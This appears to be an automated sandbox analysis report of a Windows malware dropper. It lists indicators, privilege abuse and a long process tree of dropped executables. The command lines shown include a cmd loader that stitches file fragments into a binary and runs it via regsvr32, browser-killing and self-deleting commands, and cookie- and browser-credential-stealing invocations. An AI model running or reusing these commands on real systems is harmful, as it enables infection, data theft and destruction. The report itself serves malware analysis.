a70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	aszd.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

6112 PING.EXE
7900 PING.EXE

pid	process
6112	PING.EXE
7900	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	103	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	109	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

updhhj.exejfiag3g_gg.exe

pid	process
2768	updhhj.exe
2768	updhhj.exe
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
4640	jfiag3g_gg.exe
4640	jfiag3g_gg.exe
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012
3012

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

updhhj.exe

pid process

2768 updhhj.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

KRSetp.exetaskkill.exe4111342.45taskkill.exe6936770.76MicrosoftEdge.exemd9_9sjm.exemmt.exe

description	pid	process
Token: SeDebugPrivilege	2908	KRSetp.exe
Token: SeDebugPrivilege	724	taskkill.exe
Token: SeDebugPrivilege	4236	4111342.45
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeDebugPrivilege	4652	6936770.76
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeDebugPrivilege	4812	MicrosoftEdge.exe
Token: SeDebugPrivilege	4812	MicrosoftEdge.exe
Token: SeDebugPrivilege	4812	MicrosoftEdge.exe
Token: SeDebugPrivilege	4812	MicrosoftEdge.exe
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeShutdownPrivilege	3012
Token: SeCreatePagefilePrivilege	3012
Token: SeManageVolumePrivilege	192	md9_9sjm.exe
Token: SeDebugPrivilege	2208	mmt.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

3012
3012
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

3012
3012
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

4812 MicrosoftEdge.exe
4044 MicrosoftEdgeCP.exe

pid	process
3012
3012

pid	process
3012
3012

pid	process
4812	MicrosoftEdge.exe
4044	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ad6b33184b0ceb75c0d95fd68f495095.execdji.execllhjkd.exepzysgf.execmd.exelOzXmC2Yz48U91.exeKRSetp.exeaszd.execmd.exe4582130.50

description	pid	process	target process
PID 1048 wrote to memory of 2908	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	KRSetp.exe
PID 1048 wrote to memory of 2908	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	KRSetp.exe
PID 1048 wrote to memory of 192	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	md9_9sjm.exe
PID 1048 wrote to memory of 192	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	md9_9sjm.exe
PID 1048 wrote to memory of 192	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	md9_9sjm.exe
PID 1048 wrote to memory of 772	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	aszd.exe
PID 1048 wrote to memory of 772	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	aszd.exe
PID 1048 wrote to memory of 772	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	aszd.exe
PID 1048 wrote to memory of 2296	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	cdji.exe
PID 1048 wrote to memory of 2296	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	cdji.exe
PID 1048 wrote to memory of 2296	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	cdji.exe
PID 1048 wrote to memory of 1520	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	cllhjkd.exe
PID 1048 wrote to memory of 1520	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	cllhjkd.exe
PID 1048 wrote to memory of 1520	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	cllhjkd.exe
PID 1048 wrote to memory of 2768	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	updhhj.exe
PID 1048 wrote to memory of 2768	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	updhhj.exe
PID 1048 wrote to memory of 2768	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	updhhj.exe
PID 1048 wrote to memory of 4068	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	pzysgf.exe
PID 1048 wrote to memory of 4068	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	pzysgf.exe
PID 1048 wrote to memory of 4068	1048	ad6b33184b0ceb75c0d95fd68f495095.exe	pzysgf.exe
PID 2296 wrote to memory of 1180	2296	cdji.exe	azure.exe
PID 2296 wrote to memory of 1180	2296	cdji.exe	azure.exe
PID 2296 wrote to memory of 1180	2296	cdji.exe	azure.exe
PID 1520 wrote to memory of 1488	1520	cllhjkd.exe	cmd.exe
PID 1520 wrote to memory of 1488	1520	cllhjkd.exe	cmd.exe
PID 1520 wrote to memory of 1488	1520	cllhjkd.exe	cmd.exe
PID 4068 wrote to memory of 2536	4068	pzysgf.exe	jfiag3g_gg.exe
PID 4068 wrote to memory of 2536	4068	pzysgf.exe	jfiag3g_gg.exe
PID 4068 wrote to memory of 2536	4068	pzysgf.exe	jfiag3g_gg.exe
PID 1488 wrote to memory of 2828	1488	cmd.exe	lOzXmC2Yz48U91.exe
PID 1488 wrote to memory of 2828	1488	cmd.exe	lOzXmC2Yz48U91.exe
PID 1488 wrote to memory of 2828	1488	cmd.exe	lOzXmC2Yz48U91.exe
PID 1488 wrote to memory of 724	1488	cmd.exe	taskkill.exe
PID 1488 wrote to memory of 724	1488	cmd.exe	taskkill.exe
PID 1488 wrote to memory of 724	1488	cmd.exe	taskkill.exe
PID 2828 wrote to memory of 416	2828	lOzXmC2Yz48U91.exe	cmd.exe
PID 2828 wrote to memory of 416	2828	lOzXmC2Yz48U91.exe	cmd.exe
PID 2828 wrote to memory of 416	2828	lOzXmC2Yz48U91.exe	cmd.exe
PID 2908 wrote to memory of 4236	2908	KRSetp.exe	4111342.45
PID 2908 wrote to memory of 4236	2908	KRSetp.exe	4111342.45
PID 2908 wrote to memory of 4236	2908	KRSetp.exe	4111342.45
PID 2908 wrote to memory of 4304	2908	KRSetp.exe	4582130.50
PID 2908 wrote to memory of 4304	2908	KRSetp.exe	4582130.50
PID 2908 wrote to memory of 4304	2908	KRSetp.exe	4582130.50
PID 772 wrote to memory of 4328	772	aszd.exe	cmd.exe
PID 772 wrote to memory of 4328	772	aszd.exe	cmd.exe
PID 772 wrote to memory of 4328	772	aszd.exe	cmd.exe
PID 2828 wrote to memory of 4564	2828	lOzXmC2Yz48U91.exe	cmd.exe
PID 2828 wrote to memory of 4564	2828	lOzXmC2Yz48U91.exe	cmd.exe
PID 2828 wrote to memory of 4564	2828	lOzXmC2Yz48U91.exe	cmd.exe
PID 2908 wrote to memory of 4576	2908	KRSetp.exe	2767745.30
PID 2908 wrote to memory of 4576	2908	KRSetp.exe	2767745.30
PID 2908 wrote to memory of 4576	2908	KRSetp.exe	2767745.30
PID 2908 wrote to memory of 4652	2908	KRSetp.exe	6936770.76
PID 2908 wrote to memory of 4652	2908	KRSetp.exe	6936770.76
PID 2908 wrote to memory of 4652	2908	KRSetp.exe	6936770.76
PID 4564 wrote to memory of 4852	4564	cmd.exe	cmd.exe
PID 4564 wrote to memory of 4852	4564	cmd.exe	cmd.exe
PID 4564 wrote to memory of 4852	4564	cmd.exe	cmd.exe
PID 4304 wrote to memory of 4864	4304	4582130.50	Windows Host.exe
PID 4304 wrote to memory of 4864	4304	4582130.50	Windows Host.exe
PID 4304 wrote to memory of 4864	4304	4582130.50	Windows Host.exe
PID 4564 wrote to memory of 4920	4564	cmd.exe	cmd.exe
PID 4564 wrote to memory of 4920	4564	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\ad6b33184b0ceb75c0d95fd68f495095.exe
"C:\Users\Admin\AppData\Local\Temp\ad6b33184b0ceb75c0d95fd68f495095.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1048

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2908

C:\ProgramData\4111342.45
"C:\ProgramData\4111342.45"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\ProgramData\4582130.50
"C:\ProgramData\4582130.50"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4304

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
4⤵
- Executes dropped EXE
PID:4864

C:\ProgramData\2767745.30
"C:\ProgramData\2767745.30"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4576

C:\ProgramData\6936770.76
"C:\ProgramData\6936770.76"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Users\Admin\AppData\Local\Temp\md9_9sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_9sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\Users\Admin\AppData\Local\Temp\aszd.exe
"C:\Users\Admin\AppData\Local\Temp\aszd.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:4328

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Users\Admin\AppData\Local\Temp\cdji.exe
"C:\Users\Admin\AppData\Local\Temp\cdji.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2296

C:\Users\Admin\AppData\Local\Temp\RarSFX0\azure.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\azure.exe"
3⤵
- Executes dropped EXE
PID:1180

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
4⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\cllhjkd.exe
"C:\Users\Admin\AppData\Local\Temp\cllhjkd.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /ccopy /y "C:\Users\Admin\AppData\Local\Temp\cllhjkd.exe" ..\lOzXmC2Yz48U91.exe > Nul&& start..\lOzXmC2Yz48U91.exe /pn3fqc2mCzy0PnfVvGlq &if"" == "" for %piN ( "C:\Users\Admin\AppData\Local\Temp\cllhjkd.exe" ) do taskkill -iM "%~Nxp" /f > Nul
3⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Users\Admin\AppData\Local\Temp\lOzXmC2Yz48U91.exe
..\lOzXmC2Yz48U91.exe /pn3fqc2mCzy0PnfVvGlq
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /ccopy /y "C:\Users\Admin\AppData\Local\Temp\lOzXmC2Yz48U91.exe" ..\lOzXmC2Yz48U91.exe > Nul&& start..\lOzXmC2Yz48U91.exe /pn3fqc2mCzy0PnfVvGlq &if"/pn3fqc2mCzy0PnfVvGlq " == "" for %piN ( "C:\Users\Admin\AppData\Local\Temp\lOzXmC2Yz48U91.exe" ) do taskkill -iM "%~Nxp" /f > Nul
5⤵
PID:416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /C ECHo | sEt /p = "MZ" > 9KDHJdQI.nr9 &copy/Y/B9kDHjdQI.nR9 + XyFD2pQ.Drj + TqngE.3O4 + S2O4yDeQ.Kr9 + vY6Od7e.S + jbN2U.6J + k5e7GwBX.LT +VAZ76.SL + o2BVr.KL +R8~W2.PGM + 2VVC8.GO +fb7AN1.57 +Hai7N.MTY +LZFc5F1.ZP ..\1R2D6qoQ.B > NUl & start regsvr32.exe /u -S ..\1r2D6qOQ.b & del /q * > NUL
5⤵
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>9KDHJdQI.nr9"
6⤵
PID:4920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHo "
6⤵
PID:4852

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /u -S ..\1r2D6qOQ.b
6⤵
- Loads dropped DLL
PID:3564

C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "cllhjkd.exe" /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:724

C:\Users\Admin\AppData\Local\Temp\updhhj.exe
"C:\Users\Admin\AppData\Local\Temp\updhhj.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2768

C:\Users\Admin\AppData\Local\Temp\pzysgf.exe
"C:\Users\Admin\AppData\Local\Temp\pzysgf.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4068

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2536

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4640

C:\Users\Admin\AppData\Local\Temp\mmt.exe
"C:\Users\Admin\AppData\Local\Temp\mmt.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Users\Admin\AppData\Local\Temp\H0U4ZAWXZN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\H0U4ZAWXZN\multitimer.exe" 0 30601988b56f78c9.53290271 0 102
3⤵
- Executes dropped EXE
PID:2184

C:\Users\Admin\AppData\Local\Temp\H0U4ZAWXZN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\H0U4ZAWXZN\multitimer.exe" 1 3.1616488238.6059a72ea9dfe 102
4⤵
PID:4724

C:\Users\Admin\AppData\Local\Temp\H0U4ZAWXZN\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\H0U4ZAWXZN\multitimer.exe" 2 3.1616488238.6059a72ea9dfe
5⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\h3ftxy22kll\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\h3ftxy22kll\AwesomePoolU1.exe"
6⤵
PID:1496

C:\Users\Admin\AppData\Local\Temp\iipirsnaq4w\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\iipirsnaq4w\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:400

C:\Users\Admin\AppData\Local\Temp\is-HKTGV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HKTGV.tmp\Setup3310.tmp" /SL5="$202E6,138429,56832,C:\Users\Admin\AppData\Local\Temp\iipirsnaq4w\Setup3310.exe" /Verysilent /subid=577
7⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\is-TU7K8.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TU7K8.tmp\Setup.exe" /Verysilent
8⤵
PID:5760

C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe
"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"
9⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
10⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b edge
11⤵
PID:4272

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b chrome
11⤵
PID:4896

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b firefox
11⤵
PID:3536

C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"
9⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:6980

C:\Program Files (x86)\Versium Research\Versium Research\tmYEMng5kdMyhiZLGJpcjr1W.exe
"C:\Program Files (x86)\Versium Research\Versium Research\tmYEMng5kdMyhiZLGJpcjr1W.exe"
9⤵
PID:6036

C:\Users\Admin\Documents\H4Xfrww1uulOQPU3UqCHuQH2.exe
"C:\Users\Admin\Documents\H4Xfrww1uulOQPU3UqCHuQH2.exe"
10⤵
PID:6188

C:\Users\Admin\Documents\GKhtPu0408OZJoog29n7LS6g.exe
"C:\Users\Admin\Documents\GKhtPu0408OZJoog29n7LS6g.exe"
11⤵
PID:7132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{qPFP-tKhFD-L2JB-6Cpnt}\78274805211.exe"
12⤵
PID:6620

C:\Users\Admin\AppData\Local\Temp\{qPFP-tKhFD-L2JB-6Cpnt}\78274805211.exe
"C:\Users\Admin\AppData\Local\Temp\{qPFP-tKhFD-L2JB-6Cpnt}\78274805211.exe"
13⤵
PID:5700

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\{qPFP-tKhFD-L2JB-6Cpnt}\78274805211.exe"
14⤵
PID:4468

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
15⤵
- Delays execution with timeout.exe
PID:6388

C:\Users\Admin\Documents\dglyEinyk13giSOJS0PRaqVF.exe
"C:\Users\Admin\Documents\dglyEinyk13giSOJS0PRaqVF.exe"
11⤵
PID:5144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{eD7X-7Be5H-Dsbj-g3tdc}\68629714547.exe"
12⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\{eD7X-7Be5H-Dsbj-g3tdc}\68629714547.exe
"C:\Users\Admin\AppData\Local\Temp\{eD7X-7Be5H-Dsbj-g3tdc}\68629714547.exe"
13⤵
PID:2128

C:\Users\Admin\Documents\4chn14nJtmLp0ahOeZUErF5H.exe
"C:\Users\Admin\Documents\4chn14nJtmLp0ahOeZUErF5H.exe"
11⤵
PID:6936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{1UVZ-vaqZw-K0XU-mLGNw}\16853062749.exe"
12⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\{1UVZ-vaqZw-K0XU-mLGNw}\16853062749.exe
"C:\Users\Admin\AppData\Local\Temp\{1UVZ-vaqZw-K0XU-mLGNw}\16853062749.exe"
13⤵
PID:6568

C:\Users\Admin\Documents\hZcKITrqHfVJw7PHBNu4xpPf.exe
"C:\Users\Admin\Documents\hZcKITrqHfVJw7PHBNu4xpPf.exe"
11⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{cvWL-vEs4G-8lqU-L4w3E}\05039435240.exe"
12⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\{cvWL-vEs4G-8lqU-L4w3E}\05039435240.exe
"C:\Users\Admin\AppData\Local\Temp\{cvWL-vEs4G-8lqU-L4w3E}\05039435240.exe"
13⤵
PID:4756

C:\Users\Admin\Documents\wfCrlyQwAC7d7T6mVLbdfxj9.exe
"C:\Users\Admin\Documents\wfCrlyQwAC7d7T6mVLbdfxj9.exe"
10⤵
PID:6148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im wfCrlyQwAC7d7T6mVLbdfxj9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\wfCrlyQwAC7d7T6mVLbdfxj9.exe" & del C:\ProgramData\*.dll & exit
11⤵
PID:4876

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wfCrlyQwAC7d7T6mVLbdfxj9.exe /f
12⤵
- Kills process with taskkill
PID:6216

C:\Users\Admin\Documents\kzHRZUorCXZ18VnCHLYRhnVw.exe
"C:\Users\Admin\Documents\kzHRZUorCXZ18VnCHLYRhnVw.exe"
10⤵
PID:4924

C:\Users\Admin\AppData\Local\Temp\is-ML2K4.tmp\kzHRZUorCXZ18VnCHLYRhnVw.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ML2K4.tmp\kzHRZUorCXZ18VnCHLYRhnVw.tmp" /SL5="$3024C,491750,408064,C:\Users\Admin\Documents\kzHRZUorCXZ18VnCHLYRhnVw.exe"
11⤵
PID:7228

C:\Users\Admin\AppData\Local\Temp\is-F97QP.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-F97QP.tmp\Microsoft.exe" /S /UID=Irecch4
12⤵
PID:7104

C:\Program Files\MSBuild\YTDUFMJFCZ\irecord.exe
"C:\Program Files\MSBuild\YTDUFMJFCZ\irecord.exe" /VERYSILENT
13⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\is-AB2M4.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AB2M4.tmp\irecord.tmp" /SL5="$3034E,6265333,408064,C:\Program Files\MSBuild\YTDUFMJFCZ\irecord.exe" /VERYSILENT
14⤵
PID:7324

C:\Users\Admin\AppData\Local\Temp\33-b45fc-3b0-95c9d-e70c122b8f85a\Rovetykesy.exe
"C:\Users\Admin\AppData\Local\Temp\33-b45fc-3b0-95c9d-e70c122b8f85a\Rovetykesy.exe"
13⤵
PID:7892

C:\Users\Admin\AppData\Local\Temp\2f-abfb2-ca8-5c7a8-10f643ec40f35\Xuhojalyry.exe
"C:\Users\Admin\AppData\Local\Temp\2f-abfb2-ca8-5c7a8-10f643ec40f35\Xuhojalyry.exe"
13⤵
PID:7908

C:\Users\Admin\Documents\eVTqT8zXKHGDTZR7Ulsb1Utp.exe
"C:\Users\Admin\Documents\eVTqT8zXKHGDTZR7Ulsb1Utp.exe"
10⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im eVTqT8zXKHGDTZR7Ulsb1Utp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eVTqT8zXKHGDTZR7Ulsb1Utp.exe" & del C:\ProgramData\*.dll & exit
11⤵
PID:7656

C:\Windows\SysWOW64\taskkill.exe
taskkill /im eVTqT8zXKHGDTZR7Ulsb1Utp.exe /f
12⤵
- Kills process with taskkill
PID:7964

C:\Users\Admin\Documents\5DjXZv0Fdr9gGf7r5jbheUct.exe
"C:\Users\Admin\Documents\5DjXZv0Fdr9gGf7r5jbheUct.exe"
10⤵
PID:3948

C:\Users\Admin\Documents\Fyc1GGEPAlyMhFIczosmZkDs.exe
"C:\Users\Admin\Documents\Fyc1GGEPAlyMhFIczosmZkDs.exe"
10⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\is-8KO0O.tmp\Fyc1GGEPAlyMhFIczosmZkDs.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8KO0O.tmp\Fyc1GGEPAlyMhFIczosmZkDs.tmp" /SL5="$40270,239334,155648,C:\Users\Admin\Documents\Fyc1GGEPAlyMhFIczosmZkDs.exe"
11⤵
PID:7360

C:\Users\Admin\AppData\Local\Temp\is-73GOQ.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-73GOQ.tmp\ppppppfy.exe" /S /UID=lab213
12⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\81-979fe-8a5-d4eb8-b837160193e22\Mipofaerasu.exe
"C:\Users\Admin\AppData\Local\Temp\81-979fe-8a5-d4eb8-b837160193e22\Mipofaerasu.exe"
13⤵
PID:6780

C:\Users\Admin\Documents\Gz1lqsstH0GB0OQfmgReslGu.exe
"C:\Users\Admin\Documents\Gz1lqsstH0GB0OQfmgReslGu.exe"
10⤵
PID:2124

C:\Users\Admin\AppData\Local\Temp\is-OIJSN.tmp\Gz1lqsstH0GB0OQfmgReslGu.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OIJSN.tmp\Gz1lqsstH0GB0OQfmgReslGu.tmp" /SL5="$205A8,491750,408064,C:\Users\Admin\Documents\Gz1lqsstH0GB0OQfmgReslGu.exe"
11⤵
PID:7408

C:\Users\Admin\AppData\Local\Temp\is-DRHAJ.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-DRHAJ.tmp\Microsoft.exe" /S /UID=Irecch4
12⤵
PID:4292

C:\Users\Admin\AppData\Local\Temp\69-c2023-648-059b0-dd1f759ef82b8\Vobecuruqe.exe
"C:\Users\Admin\AppData\Local\Temp\69-c2023-648-059b0-dd1f759ef82b8\Vobecuruqe.exe"
13⤵
PID:7596

C:\Users\Admin\Documents\QIXtefkyP0R3mB9zTgQsN9nN.exe
"C:\Users\Admin\Documents\QIXtefkyP0R3mB9zTgQsN9nN.exe"
10⤵
PID:7296

C:\Users\Admin\AppData\Local\Temp\is-O51KP.tmp\QIXtefkyP0R3mB9zTgQsN9nN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O51KP.tmp\QIXtefkyP0R3mB9zTgQsN9nN.tmp" /SL5="$5029A,239334,155648,C:\Users\Admin\Documents\QIXtefkyP0R3mB9zTgQsN9nN.exe"
11⤵
PID:7568

C:\Users\Admin\AppData\Local\Temp\is-6HM8R.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-6HM8R.tmp\ppppppfy.exe" /S /UID=lab213
12⤵
PID:6964

C:\Users\Admin\AppData\Local\Temp\f8-9a098-5bb-7059c-c8e95e75ac21d\Dejiqemytu.exe
"C:\Users\Admin\AppData\Local\Temp\f8-9a098-5bb-7059c-c8e95e75ac21d\Dejiqemytu.exe"
13⤵
PID:8012

C:\Program Files\Q6JO5W0PWK\HCBIPSXMXI\prolab.exe
"C:\Program Files\Q6JO5W0PWK\HCBIPSXMXI\prolab.exe" /VERYSILENT
13⤵
PID:7956

C:\Users\Admin\AppData\Local\Temp\is-T2KJQ.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T2KJQ.tmp\prolab.tmp" /SL5="$305A8,575243,216576,C:\Program Files\Q6JO5W0PWK\HCBIPSXMXI\prolab.exe" /VERYSILENT
14⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\b3-e28d3-adc-d7a97-ec03d030a7b44\Fibylozhujo.exe
"C:\Users\Admin\AppData\Local\Temp\b3-e28d3-adc-d7a97-ec03d030a7b44\Fibylozhujo.exe"
13⤵
PID:5948

C:\Users\Admin\Documents\9kWSdKcNgkvHOt24yzplt4YC.exe
